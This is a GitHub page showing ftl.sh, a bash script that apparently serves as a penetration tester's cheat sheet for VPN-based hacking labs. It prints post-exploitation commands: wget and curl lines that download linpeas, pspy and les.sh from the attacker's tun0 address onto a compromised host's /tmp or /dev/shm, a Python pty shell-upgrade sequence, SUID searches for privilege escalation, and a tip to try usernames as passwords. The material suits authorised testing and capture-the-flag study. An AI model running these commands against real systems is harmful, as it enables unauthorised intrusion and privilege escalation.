-
Notifications
You must be signed in to change notification settings - Fork 0
/
ftl.sh
executable file
·57 lines (47 loc) · 1.58 KB
/
ftl.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!/bin/bash
# create an alias `ftl` to invoke this script
# TUN0IP=$(/sbin/ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1)
TUN0IP=$((ifconfig tun0 | awk '/inet /{print $2}') 2>/dev/null)
echo ""
if [[ ! -z "$TUN0IP" ]];
then
echo "tun0: $TUN0IP "
else
TUN0IP="IP"
echo "tun0: disconnected"
fi
# echo "tun0: $TUN0IP"
echo ""
echo "==================================="
echo " Linux File Transfer"
echo "==================================="
echo ""
echo "wget $TUN0IP/linpeas.sh -P /tmp"
echo "wget $TUN0IP/linpeas.sh -P /dev/shm"
echo "curl $TUN0IP/linpeas.sh -o /tmp/lp.sh"
echo "curl $TUN0IP/linpeas.sh -o /dev/shm/lp.sh"
echo "wget $TUN0IP/pspy64 -P /tmp"
echo "wget $TUN0IP/les.sh -P /tmp"
echo "fetch $TUN0IP/linpeas.sh #FreeBSD"
echo ""
echo "==================================="
echo " Upgrade Shell"
echo "==================================="
echo ""
echo "python -c 'import pty;pty.spawn(\"/bin/bash\")'"
echo "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"
echo "Ctrl + Z"
echo "stty raw -echo; fg; reset"
echo "export TERM=xterm-256color"
echo "stty columns 146 rows 36"
echo "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/tmp"
echo ""
echo "==================================="
echo " Privilege Escalation"
echo "==================================="
echo ""
echo "find / -perm /4000 2>/dev/null"
echo "find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null"
echo "Try usernames as passwords"
echo ""
echo "More at: https://book.hacktricks.xyz/exfiltration"